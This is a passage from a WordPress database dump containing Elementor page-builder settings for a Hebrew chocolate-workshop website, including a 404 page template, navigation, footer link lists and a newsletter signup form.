right\",\"background_size\":\"cover\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"36968c76\",\"elType\":\"widget\",\"settings\":{\"space_mobile\":{\"unit\":\"px\",\"size\":173}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(606,134,'_elementor_version','0.4'),(607,134,'_edit_last','1'),(608,134,'_yoast_wpseo_content_score','30'),(620,134,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(621,139,'_elementor_template_type','single'),(622,139,'_elementor_edit_mode','builder'),(623,139,'_elementor_conditions','a:1:{i:0;s:29:\"include/singular/not_found404\";}'),(624,139,'_wp_page_template','default'),(625,139,'_elementor_data','[{\"id\":\"fea7b5\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"15dbe7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"723c6bac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62251213\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"eaceb8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"64f357a3\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"10c4aa07\",\"elType\":\"section\",\"settings\":{\"height\":\"full\",\"custom_height\":{\"unit\":\"vh\",\"size\":100},\"content_position\":\"middle\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"layout\":\"full_width\",\"column_position\":\"stretch\",\"reverse_order_mobile\":\"reverse-mobile\",\"custom_height_tablet\":{\"unit\":\"vh\",\"size\":\"\"},\"custom_height_mobile\":{\"unit\":\"vh\",\"size\":\"\"}},\"elements\":[{\"id\":\"53e3b92f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":55},\"elements\":[{\"id\":\"3d6dbce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"404\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":199},\"typography_font_weight\":\"bold\",\"typography_line_height\":{\"unit\":\"px\",\"size\":170},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":150},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":120}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"318b0472\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05e6\\u05d8\\u05e2\\u05e8\\u05d9\\u05dd, \\u05d4\\u05e2\\u05de\\u05d5\\u05d3 \\u05e9\\u05d7\\u05d9\\u05e4\\u05e9\\u05ea \\u05db\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e7\\u05d9\\u05d9\\u05dd, \\u05dc\\u05d0 \\u05d1\\u05db\\u05d5\\u05d5\\u05e0\\u05d4.\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":23},\"align\":\"center\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.3},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":20},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a17ec63\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d7\\u05d6\\u05d5\\u05e8 \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d4\\u05d1\\u05d9\\u05ea\",\"size\":\"lg\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.1},\"align\":\"center\",\"icon_indent\":{\"unit\":\"px\",\"size\":16},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4b9cfcc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"top right\",\"background_size\":\"cover\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"36968c76\",\"elType\":\"widget\",\"settings\":{\"space_mobile\":{\"unit\":\"px\",\"size\":173}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"692d9226\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"1163408c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5611192a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"58660710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"5eaef7ba\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3ac6a154\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"2b3d0b82\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"3a12d7ff\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7311fd62\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"19017191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"494db04b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4c8c1610\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"26d5e26c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(626,139,'_elementor_version','0.4'),(627,139,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(628,65,'_edit_lock','1527094226:1'),(630,140,'_elementor_template_type','section'),(631,140,'_elementor_edit_mode','builder'),(632,140,'_wp_page_template','default'),(633,140,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 